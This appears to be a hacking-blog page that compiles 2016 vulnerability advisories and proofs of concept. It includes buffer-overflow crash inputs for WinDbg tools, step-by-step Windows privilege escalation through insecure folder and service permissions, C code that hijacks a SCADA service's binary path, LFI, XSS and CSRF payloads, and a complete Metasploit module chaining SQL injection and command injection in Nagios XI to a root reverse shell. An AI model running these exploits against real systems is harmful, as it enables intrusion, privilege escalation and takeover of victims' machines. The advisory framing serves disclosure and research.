[+] Credits: HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MS-WINDBG-LOGVIEWER-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.microsoft.com
Product:
====================
WinDbg logviewer.exe
LogViewer (logviewer.exe), a tool that displays the logs created, part of
WinDbg application.
Vulnerability Type:
===================
Buffer Overflow DOS
Vulnerability Details:
=====================
Buffer overflow in WinDbg "logviewer.exe" when opening corrupted .lgv
files. App crash then Overwrite of MMX registers etc...
this utility belongs to Windows Kits/8.1/Debuggers/x86
Read Access Violation / Memory Corruption
Win32 API Log Viewer
6.3.9600.17298
Windbg x86
logviewer.exe
Log Viewer 3.01 for x86
(5fb8.32fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Windows\syswow64\msvcrt.dll -
eax=013dad30 ebx=005d0000 ecx=00000041 edx=00000000 esi=005d2000
edi=013dcd30
eip=754fa048 esp=0009f840 ebp=0009f848 iopl=0 nv up ei pl nz na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00210206
msvcrt!memmove+0x1ee:
754fa048 660f6f06 movdqa xmm0,xmmword ptr [esi]
ds:002b:005d2000=????????????????????????????????
gs 2b
fs 53
es 2b
ds 2b
edi 136cd30
esi 7d2000
ebx 7d0000
edx 0
ecx 41
eax 136ad30
ebp df750
eip 754fa048
cs 23
efl 210206
esp df748
ss 2b
dr0 0
dr1 0
dr2 0
dr3 0
dr6 0
dr7 0
di cd30
si 2000
bx 0
dx 0
cx 41
ax ad30
bp f750
ip a048
fl 206
sp f748
bl 0
dl 0
cl 41
al 30
bh 0
dh 0
ch 0
ah ad
fpcw 27f
fpsw 4020
fptw ffff
fopcode 0
fpip 76454c1e
fpipsel 23
fpdp 6aec2c
fpdpsel 2b
st0 -1.00000000000000e+000
st1 -1.00000000000000e+000
st2 -1.00000000000000e+000
st3 9.60000000000000e+001
st4 1.08506945252884e-004
st5 -1.00000000000000e+000
st6 0.00000000000000e+000
st7 0.00000000000000e+000
mm0 0:2:2:2
mm1 0:0:2:202
mm2 0:1:1:1
mm3 c000:0:0:0
mm4 e38e:3900:0:0
mm5 0:0:0:0
mm6 0:0:0:0
mm7 0:0:0:0
mxcsr 1fa0
xmm0 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm1 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm2 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm3 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm4 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm5 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm6 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm7 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
iopl 0
of 0
df 0
if 1
tf 0
sf 0
zf 0
af 0
pf 1
cf 0
vip 0
vif 0
xmm0l 4141:4141:4141:4141
xmm1l 4141:4141:4141:4141
xmm2l 4141:4141:4141:4141
xmm3l 4141:4141:4141:4141
xmm4l 4141:4141:4141:4141
xmm5l 4141:4141:4141:4141
xmm6l 4141:4141:4141:4141
xmm7l 4141:4141:4141:4141
xmm0h 4141:4141:4141:4141
xmm1h 4141:4141:4141:4141
xmm2h 4141:4141:4141:4141
xmm3h 4141:4141:4141:4141
xmm4h 4141:4141:4141:4141
xmm5h 4141:4141:4141:4141
xmm6h 4141:4141:4141:4141
xmm7h 4141:4141:4141:4141
xmm0/0 41414141
xmm0/1 41414141
xmm0/2 41414141
xmm0/3 41414141
xmm1/0 41414141
xmm1/1 41414141
xmm1/2 41414141
xmm1/3 41414141
xmm2/0 41414141
xmm2/1 41414141
xmm2/2 41414141
xmm2/3 41414141
xmm3/0 41414141
xmm3/1 41414141
xmm3/2 41414141
xmm3/3 41414141
xmm4/0 41414141
xmm4/1 41414141
xmm4/2 41414141
xmm4/3 41414141
xmm5/0 41414141
xmm5/1 41414141
xmm5/2 41414141
xmm5/3 41414141
xmm6/0 41414141
xmm6/1 41414141
xmm6/2 41414141
xmm6/3 41414141
xmm7/0 41414141
xmm7/1 41414141
xmm7/2 41414141
xmm7/3 41414141
Exploit code(s):
===============
1) create .lgv file with bunch of 'A's length of 4096 overwrites XXM
registers, ECX etc
2) run from command line pipe the file to it to watch it crash and burn.
///////////////////////////////////////////////////////////////////////
Disclosure Timeline:
===============================
Vendor Notification: June 23, 2016
Vendor acknowledged: July 1, 2016
Vendor reply: Will not fix (stability issue)
July 8, 2016 : Public Disclosure
Severity Level:
================
Low
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863108771
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
'''
[+] Credits: HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MS-KILL-UTILITY-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.microsoft.com
Product:
=========================================
Microsoft Process Kill Utility "kill.exe"
File version: 6.3.9600.17298
The Kill tool (kill.exe), a tool used to terminate a process, part of the
WinDbg program.
Vulnerability Type:
===================
Buffer Overflow
SEH Buffer Overflow @ about 512 bytes
Vulnerability Details:
=====================
Register dump
'SEH chain of main thread
Address SE handler
001AF688 kernel32.756F489B
001AFBD8 52525252
42424242 *** CORRUPT ENTRY ***
001BF81C 41414141 AAAA
001BF820 41414141 AAAA
001BF824 41414141 AAAA
001BF828 41414141 AAAA
001BF82C 41414141 AAAA
001BF830 41414141 AAAA
001BF834 909006EB ë Pointer to next SEH record
001BF838 52525252 RRRR SE handler <================
001BF83C 90909090
001BF840 90909090
Exploit code(s):
================
Python POC.
'''
junk="A"*508+"RRRR"
pgm='c:\\Program Files (x86)\\Windows Kits\\8.1\\Debuggers\\x86\\kill.exe '
subprocess.Popen([pgm, junk], shell=False)
'''
Disclosure Timeline:
==================================
Vendor Notification: June 24, 2016
Vendor reply: Will not security service
July 8, 2016 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
================
Low
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
'''
Title: InstantHMI - EoP: User to ADMIN
CWE Class: CWE-276: Incorrect Default Permissions
Date: 01/06/2016
Vendor: Software Horizons
Product: InstantHMI
Version: 6.1
Download link: http://www.instanthmi.com/ihmisoftware.htm
Tested on: Windows 7 x86, fully patched
Release mode: no bugbounty program, public release
Installer Name: IHMI61-PCInstall-Unicode.exe
MD5: ee3ca3181c51387d89de19e89aea0b31
SHA1: c3f1929093a3bc28f4f8fdd9cb38b1455d7f0d6f
- 1. Introduction: -
During a standard installation (default option) the installer
automatically creates a folder named "IHMI-6" in the root drive.
No other location can be specified during standard installation.
As this folder receives default permissions AUTHENTICATED USERS
are given the WRITE permission.
Because of this they can replace binaries or plant malicious
DLLs to obtain elevated, administrative level, privileges.
- 2. Technical Details/PoC: -
A. Obtain and execute the installer.
B. Observe there is no prompt for the installation location.
C. Review permissions under the Explorer Security tab or run icacls.exe
Example:
IHMI-6 BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
Successfully processed 1 files; Failed processing 0 files
D. Change the main executable: InstantHMI.exe with a malicious copy.
E. Once executed by an administrator our code will run
under administrator level privileges.
- 3. Mitigation: -
A. Install under "c:\program files" or "C:\Program Files (x86)"
B. set appropriate permissions on the application folder.
- 4. Author: -
sh4d0wman
######################
# Exploit Title : WordPress Lazy content Slider Plugin - CSRF Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : https://wordpress.org/support/view/plugin-reviews/lazy-content-slider
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 3.4
# Date: 2016/07/08
######################
#
# PoC:
# The vulnerable page is
# /wp-content/plugins/lazy-content-slider/lzcs_admin.php
# The Code for CSRF.html is
<html>
<form action="http://localhost/wp/wp-admin/admin.php?page=lazy-content-slider%2Flzcs.php" method="POST">
<input name="lzcs" type="text" value="lzcs">
<input name="lzcs_color" type="text" value="dark">
<input type="text" name="lzcs_count" value="5">
<input type="submit" value="go!!">
</form>
</html>
#
######################
# Discovered by : Mojtaba MobhaM
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################
Title: Hide.Me VPN Client - EoP: User to SYSTEM
CWE Class: CWE-276: Incorrect Default Permissions
Date: 01/06/2016
Vendor: eVenture
Product: Hide.Me VPN Client
Version: 1.2.4
Download link: https://hide.me/en/software/windows
Tested on: Windows 7 x86, fully patched
Release mode: no bugbounty program, public release
Installer Name: Hide.me-Setup-1.2.4.exe
MD5: e5e5e2fa2c9592660a180357c4482740
SHA1: 4729c45d6399c759cd8f6a0c5773e08c6c57e034
- 1. Introduction: -
The installer automatically creates a folder named "hide.me VPN" under
c:\program files\ for the software.
No other location can be specified during installation.
The folder has insecure permissions allowing EVERYONE the WRITE permission.
Users can replace binaries or plant malicious DLLs to obtain elevated privileges.
As the software is running one executable as service under SYSTEM
permissions an attacker could elevate from regular user to SYSTEM.
- 2. Technical Details/PoC: -
A. Obtain and execute the installer.
B. Observe there is no prompt to specify an installation location.
C. Review permissions under the Explorer Security tab or run icacls.exe
Example:
C:\Program Files\hide.me VPN Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
C. A user can overwrite an executable or drop a malicious DLL to obtain code execution.
The highest permissions are reached by overwriting the service executable: vpnsvc.exe
However it is running at startup and can't be stopped by a non-privileged user.
As we can write to the directory we can rename all of the DLL's to DLL.old
C:\Program Files\hide.me VPN\Common.dll
C:\Program Files\hide.me VPN\SharpRaven.dll
C:\Program Files\hide.me VPN\ComLib.dll
C:\Program Files\hide.me VPN\vpnlib.dll
C:\Program Files\hide.me VPN\Newtonsoft.Json.dll
C:\Program Files\hide.me VPN\DotRas.dll
Once renamed, reboot the machine, log on as normal user.
E. Observe both application AND the system service have crashed.
Now replace vpnsvc.exe with a malicious copy.
Place back all original DLLS and reboot.
Our code will get executed under elevated permissions: SYSTEM.
- 3. Mitigation: -
A. set appropriate permissions on the application folder.
- 4. Author: -
sh4d0wman
/*
# Exploit Title: GE Proficy HMI/SCADA CIMPLICITY 8.2 Local Privilege Escalation Exploit(0 day)
# Vulnerability Discovery and Exploit Author: Zhou Yu
# Email: <504137480@qq.com>
# Version: 8.2
# Tested on: Windows 7 SP1 X32
# CVE : None
Vulnerability Description:
SERVICE_CHANGE_CONFIG Privilege Escalation
C:\Users\lenovo\Desktop\AccessChk>accesschk.exe -q -v -c CimProxy
CimProxy
Medium Mandatory Level (Default) [No-Write-Up]
RW Everyone
SERVICE_ALL_ACCESS
C:\Users\lenovo\Desktop\AccessChk>sc qc CimProxy
[SC] QueryServiceConfig �ɹ�
SERVICE_NAME: CimProxy
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Proficy\Proficy CIMPLICITY\exe\Cim
Proxy.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : CIMPLICITY Proxy Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Usage:
Put evil.exe and the exploit in the same folder and then run the exploit.
*/
#include <windows.h>
#include <stdio.h>
#include <string.h>
void main()
{
char szPath[MAX_PATH];
char *t;
GetModuleFileName(NULL,szPath,MAX_PATH);
t = strrchr(szPath, 0x5C);
t[0] = '\\';
t[1] = '\0';
strcat(szPath,"evil.exe\"");
char t1[] = "\"cmd.exe /c ";
char payload[] = "sc config CimProxy binPath= ";
strcat(t1,szPath);
strcat(payload,t1);
system(payload);
//stop service
printf("stop service!\n");
system("net stop CimProxy");
//start service
printf("start service!\n");
system("net start CimProxy");
}
OPAC KpwinSQL LFI/XSS Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product Website : http://www.kpsys.cz/
Affected version: All
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Description:
KpwinSQL suffers from an unauthenticated file inclusion vulnerability (LFI) when input passed thru the 'lang' parameter to the following scripts which are not properly verified:
+ index.php
+ help.php
+ logpin.php
+ brow.php
+ indexs.php
+ search.php
+ hledani.php
+ hled_hesl.php
before being used to include files. This can be exploited to include files from local resources with their absolute path and with directory traversal attacks.
Moreover, KpwinSQL system suffers from Cross Site Scripting vulnerability when input passed thru the 'vyhl' parameter to 'index.php' script which does not perform input validation.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Tested on: Apache/2.2.11 (Win32)
PHP/5.2.9-2
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Vulnerabilities discovered by Yakir Wizman
https://www.linkedin.com/in/yakirwizman
Date: 06.07.2016
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Proof Of Concept:
Local File Inclusion example:
http://server/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
Cross Site Scripting example:
http://server/index.php?vyhl='><script>alert('XSS')</script>&lang=cze
Sources:
https://bugs.chromium.org/p/project-zero/issues/detail?id=796
https://bugs.chromium.org/p/project-zero/issues/detail?id=795
The usermode audio subsystem for the "Samsung Android Professional Audio" is
based on JACK, which appears to be designed for single-user usage. The common
JACK configuration on Linux systems appears to be a JACK server running under
the current user account, and interacting with JACK clients from the same user
account; so with a minimal privilege difference; this is not the case with the
configuration on Android, where the JACK service runs as a more privileged user
in a less restrictive SELinux domain to the clients that can connect to it.
The shared memory implementation (implemented by com.samsung.android.IAndroidShm
system service) allows any application to access/modify/map shared memory pages
used by JACK, regardless of which application created those shared memory pages.
(NB: This possibly results in breaking the Android permissions model and
permitting applications without the required capability to access microphone
input; this was not investigated further.)
There are multiple possible ways to corrupt the internal state of any of the
shared-memory backed c++ objects in use; attached is a PoC that uses the shared
memory service to map the JackEngineControl object in use, and modify the value
of the fDriverNum member, which is used in several places without validation.
This is highly likely not the only variable stored in shared memory that is used
without proper validation; and the function shown below is definitely not the
only place that this particular variable is used dangerously. To secure this
interface it will be necessary to review all uses of variables stored in these
shared memory interfaces.
/*!
\brief Engine control in shared memory.
*/
PRE_PACKED_STRUCTURE
struct SERVER_EXPORT JackEngineControl : public JackShmMem
{
// Shared state
jack_nframes_t fBufferSize;
jack_nframes_t fSampleRate;
bool fSyncMode;
bool fTemporary;
jack_time_t fPeriodUsecs;
jack_time_t fTimeOutUsecs;
float fMaxDelayedUsecs;
float fXrunDelayedUsecs;
bool fTimeOut;
bool fRealTime;
bool fSavedRealTime; // RT state saved and restored during Freewheel mode
int fServerPriority;
int fClientPriority;
int fMaxClientPriority;
char fServerName[JACK_SERVER_NAME_SIZE+1];
JackTransportEngine fTransport;
jack_timer_type_t fClockSource;
int fDriverNum;
bool fVerbose;
// CPU Load
jack_time_t fPrevCycleTime;
jack_time_t fCurCycleTime;
jack_time_t fSpareUsecs;
jack_time_t fMaxUsecs;
jack_time_t fRollingClientUsecs[JACK_ENGINE_ROLLING_COUNT];
unsigned int fRollingClientUsecsCnt;
int fRollingClientUsecsIndex;
int fRollingInterval;
float fCPULoad;
// For OSX thread
UInt64 fPeriod;
UInt64 fComputation;
UInt64 fConstraint;
// Timer
JackFrameTimer fFrameTimer;
#ifdef JACK_MONITOR
JackEngineProfiling fProfiler;
#endif
...
This is quite a convenient exploitation primitive, as a small negative value
will cause the code in several places to index backwards from a known array;
when (any of the similar functions to the below are called, table is pointing
to the fClientTable array inside a JackEngine instance)
void JackTransportEngine::MakeAllLocating(JackClientInterface** table)
{
for (int i = GetEngineControl()->fDriverNum; i < CLIENT_NUM; i++) {
JackClientInterface* client = table[i];
if (client) {
JackClientControl* control = client->GetClientControl();
control->fTransportState = JackTransportStopped;
control->fTransportSync = true;
control->fTransportTimebase = true;
jack_log("MakeAllLocating ref = %ld", i);
}
}
}
class SERVER_EXPORT JackEngine : public JackLockAble
{
friend class JackLockedEngine;
private:
JackGraphManager* fGraphManager;
JackEngineControl* fEngineControl;
char fSelfConnectMode;
JackClientInterface* fClientTable[CLIENT_NUM];
We can see that just behind the fClientTable, we have two pointers to other
objects; a JackEngineControl and a JackGraphManager, both of which are backed by
shared memory. Since we are treating the pointer read from table as a c++ object
with a vtable pointer, this lets us trivially gain control of the flow of
execution.
Fatal signal 11 (SIGSEGV), code 1, fault addr 0x41414140 in tid 27197 (jackd)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'samsung/zeroltexx/zerolte:6.0.1/MMB29K/G925FXXU3DPAD:user/release-keys'
Revision: '10'
ABI: 'arm'
pid: 27181, tid: 27197, name: jackd >>> /system/bin/jackd <<<
AM write failed: Broken pipe
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414140
r0 f3f1a000 r1 f48c2010 r2 f48c2010 r3 41414141
r4 f3f1a000 r5 00000036 r6 f3dbf930 r7 00000078
r8 f72c8b9c r9 f6f1a308 sl f3d3f000 fp f719a991
ip f71d7a0c sp f3dbf7d8 lr f7196c43 pc 41414140 cpsr 800f0030
backtrace:
#00 pc 41414140 <unknown>
#01 pc 0003cc41 /system/lib/libjackserver.so (Jack::JackTransportEngine::MakeAllLocating(Jack::JackClientInterface**)+52)
#02 pc 0003cda1 /system/lib/libjackserver.so (Jack::JackTransportEngine::CycleEnd(Jack::JackClientInterface**, unsigned int, unsigned int)+228)
#03 pc 00048bd5 /system/lib/libjackserver.so
#04 pc 00049211 /system/lib/libjackserver.so (Jack::JackEngine::Process(unsigned long long, unsigned long long)+228)
#05 pc 000442fd /system/lib/libjackserver.so
#06 pc 00044f49 /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessGraphSyncMaster()+40)
#07 pc 00044f0d /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessGraphSync()+20)
#08 pc 00044e87 /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessSync()+94)
#09 pc 00044bbf /system/lib/libjackserver.so (Jack::JackAudioDriver::Process()+22)
#10 pc 0004fff1 /system/lib/libjackserver.so (Jack::JackThreadedDriver::Process()+24)
#11 pc 0005051f /system/lib/libjackserver.so (Jack::JackThreadedDriver::Execute()+18)
#12 pc 00040a0f /system/lib/libjackserver.so (Jack::JackAndroidThread::ThreadHandler(void*)+126)
#13 pc 0003fc53 /system/lib/libc.so (__pthread_start(void*)+30)
#14 pc 0001a38b /system/lib/libc.so (__start_thread+6)
Tombstone written to: /data/tombstones/tombstone_05
################################################################################################################
The usermode audio subsystem for the "Samsung Android Professional Audio" is
based on JACK, which appears to be designed for single-user usage. The common
JACK configuration on Linux systems appears to be a JACK server running under
the current user account, and interacting with JACK clients from the same user
account; so with a minimal privilege difference; this is not the case with the
configuration on Android, where the JACK service runs as a more privileged user
in a less restrictive SELinux domain to the clients that can connect to it.
The JACK shared memory implementation uses the struct jack_shm_info_t defined in
/common/shm.h to do some bookkeeping
PRE_PACKED_STRUCTURE
struct _jack_shm_info {
jack_shm_registry_index_t index; /* offset into the registry */
uint32_t size;
#ifdef __ANDROID__
jack_shm_fd_t fd;
#endif
union {
void *attached_at; /* address where attached */
char ptr_size[8];
} ptr; /* a "pointer" that has the same 8 bytes size when compling in 32 or 64 bits */
} POST_PACKED_STRUCTURE;
typedef struct _jack_shm_info jack_shm_info_t;
This struct is stored at the start of every JackShmAble object.
/*!
\brief
A class which objects possibly want to be allocated in shared memory derives from this class.
*/
class JackShmMemAble
{
protected:
jack_shm_info_t fInfo;
public:
void Init();
int GetShmIndex()
{
return fInfo.index;
}
char* GetShmAddress()
{
return (char*)fInfo.ptr.attached_at;
}
void LockMemory()
{
LockMemoryImp(this, fInfo.size);
}
void UnlockMemory()
{
UnlockMemoryImp(this, fInfo.size);
}
};
This means that whenever the JACK server creates an object backed by shared
memory, it also stores a pointer to that object (in the address space of the
JACK server), allowing a malicious client to bypass ASLR in the JACK server
process.
The PoC provided for the other reported JACK issue uses this to bypass ASLR in
the JACK server process.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40066.zip
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Nagios XI Chained Remote Code Execution',
'Description' => %q{
This module exploits an SQL injection, auth bypass, file upload,
command injection, and privilege escalation in Nagios XI <= 5.2.7
to pop a root shell.
},
'Author' => [
'Francesco Oddo', # Vulnerability discovery
'wvu' # Metasploit module
],
'References' => [
['EDB', '39899']
],
'DisclosureDate' => 'Mar 6 2016',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic bash-tcp php perl python openssl gawk'
}
},
'Targets' => [
['Nagios XI <= 5.2.7', version: Gem::Version.new('5.2.7')]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash',
'LHOST' => Rex::Socket.source_address
}
))
end
def check
res = send_request_cgi!(
'method' => 'GET',
'uri' => '/nagiosxi/'
)
return unless res && (html = res.get_html_document)
if (version = html.at('//input[@name = "version"]/@value'))
vprint_status("Nagios XI version: #{version}")
if Gem::Version.new(version) <= target[:version]
return CheckCode::Appears
end
end
CheckCode::Safe
end
def exploit
if check != CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Vulnerable version not found! punt!')
end
print_status('Getting API token')
get_api_token
print_status('Getting admin cookie')
get_admin_cookie
print_status('Getting monitored host')
get_monitored_host
print_status('Downloading component')
download_profile_component
print_status('Uploading root shell')
upload_root_shell
print_status('Popping shell!')
pop_dat_shell
end
#
# Cleanup methods
#
def on_new_session(session)
super
print_status('Cleaning up...')
commands = [
'rm -rf ../profile',
'unzip -qd .. ../../../../tmp/component-profile.zip',
'chown -R nagios:nagios ../profile',
"rm -f ../../../../tmp/component-#{zip_filename}"
]
commands.each do |command|
vprint_status(command)
session.shell_command_token(command)
end
end
#
# Exploit methods
#
def get_api_token
res = send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/includes/components/nagiosim/nagiosim.php',
'vars_get' => {
'mode' => 'resolve',
'host' => '\'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((' \
'SELECT backend_ticket FROM xi_users WHERE user_id=1' \
'),FLOOR(RAND(0)*2))x ' \
'FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '
}
)
if res && res.body =~ /Duplicate entry '(.*?).'/
@api_token = $1
vprint_good("API token: #{@api_token}")
else
fail_with(Failure::UnexpectedReply, 'API token not found! punt!')
end
end
def get_admin_cookie
res = send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/rr.php',
'vars_get' => {
'uid' => "1-#{Rex::Text.rand_text_alpha(8)}-" +
Digest::MD5.hexdigest(@api_token)
}
)
if res && (@admin_cookie = res.get_cookies.split('; ').last)
vprint_good("Admin cookie: #{@admin_cookie}")
get_csrf_token(res.body)
else
fail_with(Failure::NoAccess, 'Admin cookie not found! punt!')
end
end
def get_csrf_token(body)
if body =~ /nsp_str = "(.*?)"/
@csrf_token = $1
vprint_good("CSRF token: #{@csrf_token}")
else
fail_with(Failure::UnexpectedReply, 'CSRF token not found! punt!')
end
end
def get_monitored_host
res = send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/ajaxhelper.php',
'cookie' => @admin_cookie,
'vars_get' => {
'cmd' => 'getxicoreajax',
'opts' => '{"func":"get_hoststatus_table"}',
'nsp' => @csrf_token
}
)
return unless res && (html = res.get_html_document)
if (@monitored_host = html.at('//div[@class = "hostname"]/a/text()'))
vprint_good("Monitored host: #{@monitored_host}")
else
fail_with(Failure::UnexpectedReply, 'Monitored host not found! punt!')
end
end
def download_profile_component
res = send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/admin/components.php',
'cookie' => @admin_cookie,
'vars_get' => {
'download' => 'profile'
}
)
if res && res.body =~ /^PK\x03\x04/
@profile_component = res.body
else
fail_with(Failure::UnexpectedReply, 'Failed to download component! punt!')
end
end
def upload_root_shell
mime = Rex::MIME::Message.new
mime.add_part(@csrf_token, nil, nil, 'form-data; name="nsp"')
mime.add_part('1', nil, nil, 'form-data; name="upload"')
mime.add_part('1000000', nil, nil, 'form-data; name="MAX_FILE_SIZE"')
mime.add_part(payload_zip, 'application/zip', 'binary',
'form-data; name="uploadedfile"; ' \
"filename=\"#{zip_filename}\"")
res = send_request_cgi!(
'method' => 'POST',
'uri' => '/nagiosxi/admin/components.php',
'cookie' => @admin_cookie,
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
'data' => mime.to_s
)
if res && res.code != 200
if res.redirect? && res.redirection.path == '/nagiosxi/install.php'
vprint_warning('Nagios XI not configured')
else
fail_with(Failure::PayloadFailed, 'Failed to upload root shell! punt!')
end
end
end
def pop_dat_shell
send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/includes/components/perfdata/graphApi.php',
'cookie' => @admin_cookie,
'vars_get' => {
'host' => @monitored_host,
'end' => ';sudo ../profile/getprofile.sh #'
}
)
end
#
# Support methods
#
def payload_zip
zip = Rex::Zip::Archive.new
Zip::File.open_buffer(@profile_component) do |z|
z.each do |f|
zip.entries << Rex::Zip::Entry.new(
f.name,
(if f.ftype == :file
if f.name == 'profile/getprofile.sh'
payload.encoded
else
z.read(f)
end
else
''
end),
Rex::Zip::CM_DEFLATE,
nil,
(Rex::Zip::EFA_ISDIR if f.ftype == :directory)
)
end
end
zip.pack
end
#
# Utility methods
#
def zip_filename
@zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip'
end
end
# Several vulnerabilities doscovered in OpenFire version 3.10.2 to 4.0.1
## Product Description
**OpenFire** is an opensource project under GNU GPL licence. It provides a Jabber/XMPP server fully develloped in Java. It's develloped by the **Ignite realtime** community.
The actual version of the product is 4.0.2.
Official web site : http://igniterealtime.org/
Several vulnerabilities have been discovered between 2015, October and 2016, February.
Reported vulnerabilities are similar to those previously discovered by hyp3rlinx, although they concern different pages.
In brief, the flaws are of the following kinds: CSRF, XSS (reflected and stored), file upload and information disclosure. Most vulnerabilities need an administration access to the web application and may lead to personal information leakage or account take-over.
**Ingnite realtime** fixed some vulnerabilities (the corresponding commit ID are indicated in this document).
## Several Relected XSS Vulnerabilities identified in Openfire 3.10.2
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-79
**CVSS Base Score**: 5.2
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several XSS vulnerabilities have been found on several pages of the administration panel. Reflected XSS may lead to session hijacking on admin user.
### Proof of Concept
#### *domain* and *remotePort* variables from *server2server-settings.jsp*
The following POST values can be sent to trigger the vulnerability:
```
domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&remotePort=5269&serverAllowed=Add+Server
```
or
```
domain=testt&remotePort=5269%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverAllowed=Add+Server
```
or
```
domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverBlocked=Block+Server
```
